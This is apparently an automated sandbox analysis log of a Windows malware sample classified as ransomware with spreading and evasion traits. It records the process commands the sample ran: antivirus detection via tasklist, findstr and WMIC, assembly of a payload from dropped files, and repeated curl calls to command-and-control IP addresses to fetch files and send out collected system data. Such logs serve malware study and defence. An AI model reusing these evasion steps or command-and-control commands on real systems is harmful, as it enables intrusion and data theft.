Source: RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://www.digicert.com/CPS0
Source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, zip.exe.50.drString found in binary or memory: http://www.info-zip.org/
Source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, azvw.exe, 00000032.00000000.2764607506.000000000041E000.00000002.00000001.01000000.00000007.sdmp, azvw.exe, 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp, zip.exe.50.dr, azvw.exe.10.drString found in binary or memory: http://www.info-zip.org/zip-bug.html;
Source: PsInfo64.exe.50.dr, PsInfo.exe.50.drString found in binary or memory: http://www.sysinternals.com
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Either.pif.90.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5

Spam, unwanted Advertisements and Ransom Demands

barindex
Writes many files with high entropy
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Bracket entropy: 7.99828269179Jump to dropped file
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Chairman entropy: 7.99705670912Jump to dropped file
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\During entropy: 7.99782535181Jump to dropped file
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Asked entropy: 7.99749706703Jump to dropped file
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Leaving entropy: 7.99804343585Jump to dropped file
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Perhaps entropy: 7.99302030214Jump to dropped file
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Label entropy: 7.99832006496Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\139918\v entropy: 7.99961760371Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifFile created: C:\Users\user\AppData\Roaming\DolphinDumps\xhwq.zip entropy: 7.99812683975Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Showcase entropy: 7.99817987302Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Parts entropy: 7.99745443978Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Bailey entropy: 7.99784242676Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Samples entropy: 7.99803767944Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Considerations entropy: 7.99749833976Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Shepherd entropy: 7.99642551519Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Eight entropy: 7.99641122578Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Norman entropy: 7.99777953585Jump to dropped file
Source: curl.exeProcess created: 48
Source: cmd.exeProcess created: 60

System Summary

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,86_2_00403883
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Windows\EthnicEffectJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Windows\LoWeedJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Windows\BeastalityGtkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\TmpMoon
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\NotifiedAaron
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\BrushSub
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\McLol
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040885050_2_00408850
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040C82050_2_0040C820
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0041117050_2_00411170
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040E90050_2_0040E900
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040CE4950_2_0040CE49
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040CE5050_2_0040CE50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040221050_2_00402210
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00408EC050_2_00408EC0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00417EE350_2_00417EE3
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040F28050_2_0040F280
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00409FD050_2_00409FD0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004093E050_2_004093E0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_0040497C86_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00406ED286_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_004074BB86_2_004074BB
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\139918\Ur.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: String function: 00412920 appears 282 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: String function: 00406640 appears 48 times
Source: PsInfo.exe.50.drStatic PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Source: PsInfo64.exe.50.drStatic PE information: Resource name: BINRES type: PE32+ executable (console) x86-64, for MS Windows
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs vqMMwqCFZQ.exe
Source: vqMMwqCFZQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.rans.spre.evad.winEXE@298/62@1/2
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00412830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLastError,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,50_2_00412830
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifFile created: C:\Users\user\AppData\Roaming\DolphinDumpsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4468:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3068:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsnDDCD.tmpJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat
Source: vqMMwqCFZQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: vqMMwqCFZQ.exeReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile read: C:\Users\user\Desktop\vqMMwqCFZQ.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\vqMMwqCFZQ.exe "C:\Users\user\Desktop\vqMMwqCFZQ.exe"
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139918
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SyntaxMilesImperialTriple" Credits
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps v
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139918\Ur.pif Ur.pif v
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
